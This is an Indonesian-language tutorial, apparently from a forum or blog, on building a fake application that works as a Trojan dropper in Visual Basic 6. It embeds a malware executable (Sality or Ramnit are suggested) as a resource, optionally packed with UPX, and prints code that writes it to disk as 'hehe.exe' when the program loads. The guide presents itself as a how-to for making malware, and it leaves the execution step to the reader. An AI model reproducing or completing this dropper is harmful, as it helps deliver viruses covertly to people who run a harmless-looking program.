Membuat FAKE Application

nyapa dulu ahhh ...
HHHHhhhhhhhhaaaaaaaaaaaaiiiiiiiiiiiiiiiiiiiiiiiiiiiiii agan-agan smua gmna kabarnya ...
oke pical gk mo basa-basilangsung aja ...

Pada tutorial ini, saya ingin memberi contoh Fake Application yang melakukan aksi Drop File Executable, seperti beberapa tipe Trojan yang jika dijalankan terlihat seperti program biasa tetapi secara diam-diam melakukan ekstrak [drop] file lainnya kemudian file hasil ekstrak di eksekusi untuk menjalankan aksinya..

Oke, langsung pada cara pembuatan, pertama buka Microsoft Visual Basic 6 anda, buat project baru dengan tipe standar EXE, kemudian buat 1 form baru.

Pilih Menu Tools – Resource Editor,lalu klik icon Add Custom Resource

Lihat gambar:

 

Pilih file executable yang anda inginkan misalnya Sality atau Ramnit juga boleh. Kemudian Open, file yang akan dibuat menjadi resource file ber-ekstensi .RES, sehingga bisa disimpan ke dalam program. File executable bisa anda pack dahulu dengan UPX, Mpress dan sebagainya agar ukuran file menjadi lebih kecil.

Ketika akan menyimpan resource ,beri nama sesuai keinginan anda misalnya project1.RES

Setelah sukses “melampirkan” malware atau program lain kedalam program utama, maka ketik kode berikut pada form :

 ’membuat fungsi KeluarkanFile untuk ekstrak file
Private Function KeluarkanFile(JenisRes As String, IDRes As Long, OFile As String)

Dim DROP() As Byte
DROP = LoadResData(IDRes, JenisRes)

Open OFile For Binary As #1
Put #1, , DROP
Close #1

End Function

‘fungsi ini akan dipanggil ketika program diload ke memori

Private Sub Form_Load()
‘fungsi keluarkanfile dipanggil saat program dieksekusi,ganti nama hehe.exe sesuai keinginan anda

KeluarkanFile “CUSTOM”, 101, App.Path & “\hehe.exe”
Msgbox “File berhasil di ekstrak”,vbinformation,”Info”

End Sub

Save project kemudian run saja, maka akan muncul  file bernama hehe.exe di direktori yang sama dengan project anda berada ..

Catatan: program tidak langsung menjalankan file hasil ekstrak, silahkan tambahkan sendiri kodenya.